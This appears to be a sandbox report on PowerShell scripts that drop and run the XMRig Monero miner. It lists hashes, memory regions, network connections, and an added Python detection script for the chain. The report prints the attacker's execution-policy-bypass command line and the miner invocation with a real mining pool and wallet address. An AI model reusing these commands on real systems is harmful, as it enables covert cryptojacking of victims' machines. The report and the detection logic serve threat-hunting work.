| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
Files
memory/5000-0-0x00007FFB98E13000-0x00007FFB98E15000-memory.dmp
memory/5000-6-0x00000249FE410000-0x00000249FE432000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qr0evrap.yaq.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/5000-11-0x00007FFB98E10000-0x00007FFB998D1000-memory.dmp
memory/5000-12-0x00007FFB98E10000-0x00007FFB998D1000-memory.dmp
memory/5000-14-0x00007FFB98E10000-0x00007FFB998D1000-memory.dmp
memory/5000-15-0x00000249FEFD0000-0x00000249FEFE2000-memory.dmp
memory/5000-16-0x00000249FEFC0000-0x00000249FEFCA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4400-47-0x000002990B850000-0x000002990B870000-memory.dmp
memory/4400-48-0x000002990D240000-0x000002990D260000-memory.dmp
memory/4400-49-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-51-0x000002990D280000-0x000002990D2A0000-memory.dmp
memory/4400-50-0x000002990D260000-0x000002990D280000-memory.dmp
memory/4400-52-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/5000-53-0x00007FFB98E13000-0x00007FFB98E15000-memory.dmp
memory/5000-54-0x00007FFB98E10000-0x00007FFB998D1000-memory.dmp
memory/5000-56-0x00007FFB98E10000-0x00007FFB998D1000-memory.dmp
memory/4400-55-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-59-0x000002990D280000-0x000002990D2A0000-memory.dmp
memory/4400-58-0x000002990D260000-0x000002990D280000-memory.dmp
memory/4400-57-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-60-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-61-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-62-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-63-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-64-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-65-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-66-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-67-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-68-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-69-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-70-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-71-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-72-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-73-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-74-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-75-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-76-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-77-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-78-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-79-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-80-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-81-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-82-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-83-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-84-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-85-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-86-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-87-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-88-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-89-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-90-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-91-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-92-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-93-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-94-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-95-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-96-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-97-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-98-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-99-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-100-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-101-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-102-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-103-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-104-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-105-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-106-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-107-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-108-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-109-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-110-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-111-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-112-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-113-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-114-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-115-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-116-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-117-0x00007FF780C20000-0x00007FF781853000-memory.dmp
memory/4400-118-0x00007FF780C20000-0x00007FF781853000-memory.dmp
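The behavioral23 run above gives the full chain in one place: powershell.exe launched with -ExecutionPolicy bypass on a .ps1 in the user's Temp folder, a fetch from github.com/objects.githubusercontent.com, xmrig.exe 6.21.3 dropped under %TEMP%, started with -o gulf.moneroocean.stream:10128 -u <Monero address>, SeLockMemoryPrivilege enabled (xmrig does this for huge pages), and a TCP session to 149.102.143.109:10128. The "PID 5000 wrote to memory of 4400" rows are the parent PowerShell setting up its child and are not by themselves suspicious. ExecutionPolicy is a user-safety setting, not a security boundary, so the bypass is a weak signal on its own; it becomes useful together with the miner-specific indicators. The script below is an added example, not part of the sandbox output: it runs that detection logic over constructed telemetry whose field names (type, image, parent_image, command_line, sha256, dest_ip, dest_port, domain, privilege) are assumptions modelled on typical EDR records. The hash, pool host, port and PIDs come from this report; the regexes for Monero addresses, pool arguments and ExecutionPolicy abbreviations are generic heuristics.

```python
"""Hunt for the PowerShell -> XMRig chain documented in this report.

Added example, not part of the sandbox output. It runs detection logic over
constructed endpoint telemetry (field names are assumptions, modelled on
typical EDR process/file/network/token-adjust records).
"""
import re
from typing import Dict, List

# Indicators copied from the behavioral23 run above.
XMRIG_SHA256 = "2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda"
POOL_HOSTS = {"gulf.moneroocean.stream", "149.102.143.109"}
POOL_PORTS = {10128}

# Generic heuristics (assumptions, not taken from the report).
# Standard Monero address: 95 base58 chars, leading '4' ('8' for subaddresses).
MONERO_ADDR = re.compile(r"(?<![1-9A-Za-z])[48][1-9A-HJ-NP-Za-km-z]{94}(?![1-9A-Za-z])")
# xmrig/stratum style pool argument: -o or --url followed by host:port.
POOL_ARG = re.compile(r"(?:^|\s)(?:-o|--url)[\s=]+(\S+?):(\d{1,5})(?=\s|$)", re.I)
# powershell -ExecutionPolicy bypass, including the -ep / -exec abbreviations.
PS_BYPASS = re.compile(r"-e(?:x(?:ec(?:utionpolicy)?)?|p)?\s+bypass", re.I)
USER_TEMP = re.compile(r"\\users\\[^\\]+\\appdata\\local\\temp\\", re.I)


def check_event(ev: dict) -> List[str]:
    """Return the names of the rules that fire for one telemetry record."""
    hits: List[str] = []
    kind = ev.get("type")
    image = ev.get("image", "").lower()
    if kind == "process":
        cmd = ev.get("command_line", "")
        if image.endswith("powershell.exe") and PS_BYPASS.search(cmd):
            hits.append("powershell_executionpolicy_bypass")
        if USER_TEMP.search(image) and ev.get("parent_image", "").lower().endswith("powershell.exe"):
            hits.append("temp_exe_spawned_by_powershell")
        m = POOL_ARG.search(cmd)
        if m:
            hits.append("miner_pool_argument")
            if m.group(1).lower() in POOL_HOSTS or int(m.group(2)) in POOL_PORTS:
                hits.append("known_pool_from_report")
        if MONERO_ADDR.search(cmd):
            hits.append("monero_wallet_in_cmdline")
    elif kind == "file":
        if ev.get("sha256", "").lower() == XMRIG_SHA256:
            hits.append("xmrig_6_21_3_hash_match")
    elif kind == "network":
        if (ev.get("domain", "").lower() in POOL_HOSTS
                or ev.get("dest_ip") in POOL_HOSTS
                or ev.get("dest_port") in POOL_PORTS):
            hits.append("known_pool_connection")
    elif kind == "privilege":
        # xmrig enables SeLockMemoryPrivilege for huge pages. An executable under
        # %TEMP% doing so is a strong signal; Windows records the adjustment as
        # Security event 4703 when token-right auditing is on.
        if ev.get("privilege") == "SeLockMemoryPrivilege" and USER_TEMP.search(image):
            hits.append("selockmemory_from_user_temp")
    return hits


def triage(events: List[dict]) -> Dict[int, List[str]]:
    """Map event id -> rules fired, dropping events with no hits."""
    out: Dict[int, List[str]] = {}
    for ev in events:
        hits = check_event(ev)
        if hits:
            out[ev["id"]] = hits
    return out


def miner_chain_pids(events: List[dict]) -> List[int]:
    """PIDs that both start with a pool argument and reach a known pool.

    The process/network pair is what separates a running miner from a dropped,
    never-executed binary; the hash match alone does not tell them apart.
    """
    by_pid: Dict[int, set] = {}
    for ev in events:
        if "pid" in ev:
            by_pid.setdefault(ev["pid"], set()).update(check_event(ev))
    need = {"miner_pool_argument", "known_pool_connection"}
    return sorted(pid for pid, hits in by_pid.items() if need <= hits)


PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
XMRIG_IMAGE = r"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe"

# Constructed telemetry reproducing the behavioral23 chain (PIDs 5000 -> 4400),
# plus one benign PowerShell launch as a control. explorer.exe as parent is assumed.
SAMPLE_EVENTS = [
    {"id": 1, "type": "process", "pid": 5000, "image": PS_IMAGE, "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r'powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"'},
    {"id": 2, "type": "file", "pid": 5000, "path": XMRIG_IMAGE, "sha256": XMRIG_SHA256},
    {"id": 3, "type": "process", "pid": 4400, "image": XMRIG_IMAGE, "parent_image": PS_IMAGE,
     "command_line": '"' + XMRIG_IMAGE + '" -o gulf.moneroocean.stream:10128 '
                     "-u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF"},
    {"id": 4, "type": "privilege", "pid": 4400, "image": XMRIG_IMAGE, "privilege": "SeLockMemoryPrivilege"},
    {"id": 5, "type": "network", "pid": 4400, "dest_ip": "149.102.143.109", "dest_port": 10128,
     "domain": "gulf.moneroocean.stream"},
    {"id": 6, "type": "process", "pid": 7000, "image": PS_IMAGE, "parent_image": r"C:\Windows\explorer.exe",
     "command_line": r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"},
]

if __name__ == "__main__":
    for event_id, hits in triage(SAMPLE_EVENTS).items():
        print(event_id, ", ".join(hits))
    print("active miner PIDs:", miner_chain_pids(SAMPLE_EVENTS))
```

The hash and pool indicators will age quickly (the wallet, pool and xmrig build change per campaign); the behavioural rules (PowerShell spawning an executable out of %TEMP% that passes a pool:port and a 95-character base58 address, and then enables SeLockMemoryPrivilege) carry across variants and are the ones worth keeping in a detection set.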
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 06:41
Platform
win7-20240221-en
Max time kernel
1561s
Max time network
1563s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (10) - copia.ps1"
Network
Files
memory/2840-4-0x000007FEF5E4E000-0x000007FEF5E4F000-memory.dmp
memory/2840-7-0x000007FEF5B90000-0x000007FEF652D000-memory.dmp
memory/2840-6-0x0000000001FF0000-0x0000000001FF8000-memory.dmp
memory/2840-9-0x000007FEF5B90000-0x000007FEF652D000-memory.dmp
memory/2840-8-0x000007FEF5B90000-0x000007FEF652D000-memory.dmp
memory/2840-5-0x000000001B5F0000-0x000000001B8D2000-memory.dmp
memory/2840-10-0x000007FEF5B90000-0x000007FEF652D000-memory.dmp
memory/2840-11-0x000007FEF5B90000-0x000007FEF652D000-memory.dmp
Analysis: behavioral6
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 06:43
Platform
win10-20240404-en
Max time kernel
1799s
Max time network
1792s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
(64 matches in total, none with a recorded description, indicator, process or target.)
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3320 wrote to memory of 4988 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3320 wrote to memory of 4988 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
Files
memory/3320-3-0x00007FFB5F763000-0x00007FFB5F764000-memory.dmp
memory/3320-5-0x0000010AF30D0000-0x0000010AF30F2000-memory.dmp
memory/3320-8-0x00007FFB5F760000-0x00007FFB6014C000-memory.dmp
memory/3320-10-0x00007FFB5F760000-0x00007FFB6014C000-memory.dmp
memory/3320-9-0x0000010AF3860000-0x0000010AF38D6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_t4iqxozo.eep.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/3320-26-0x00007FFB5F760000-0x00007FFB6014C000-memory.dmp
memory/3320-49-0x0000010AF3800000-0x0000010AF3812000-memory.dmp
memory/3320-62-0x0000010AF37E0000-0x0000010AF37EA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4988-91-0x000001EFC30C0000-0x000001EFC30E0000-memory.dmp
memory/4988-92-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/3320-93-0x00007FFB5F760000-0x00007FFB6014C000-memory.dmp
memory/3320-95-0x00007FFB5F763000-0x00007FFB5F764000-memory.dmp
memory/4988-94-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/3320-96-0x00007FFB5F760000-0x00007FFB6014C000-memory.dmp
memory/3320-97-0x00007FFB5F760000-0x00007FFB6014C000-memory.dmp
memory/4988-98-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-99-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-100-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-101-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-102-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-103-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-104-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-105-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-106-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-107-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-108-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-109-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-110-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-111-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-112-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-113-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-114-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-115-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-116-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-117-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-118-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-119-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-120-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-121-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-122-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-123-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-124-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-125-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-126-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-127-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-128-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-129-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-130-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-131-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-132-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-133-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-134-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-135-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-136-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-137-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-138-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-139-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-140-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-141-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-142-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-143-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-144-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-145-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-146-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-147-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-148-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-149-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-150-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-151-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-152-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-153-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-154-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-155-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-156-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-157-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
memory/4988-158-0x00007FF78E9F0000-0x00007FF78F623000-memory.dmp
Analysis: behavioral13
Detonation Overview
Submitted
2024-07-04 03:15
Reported
2024-07-04 07:00
Platform
win10v2004-20240508-en
Max time kernel
1798s
Max time network
1799s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
(64 matches in total, none with a recorded description, indicator, process or target.)
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4192 wrote to memory of 4664 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4192 wrote to memory of 4664 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (13) - copia.ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
| US | 8.8.8.8:53 | 109.143.102.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.239.44.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.12.20.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.143.182.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gulf.moneroocean.stream | udp |
| DE | 149.102.143.109:10128 | gulf.moneroocean.stream | tcp |
Files
memory/4192-0-0x00007FFAE60C3000-0x00007FFAE60C5000-memory.dmp
memory/4192-1-0x0000024AABAF0000-0x0000024AABB12000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1atwsype.0ve.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
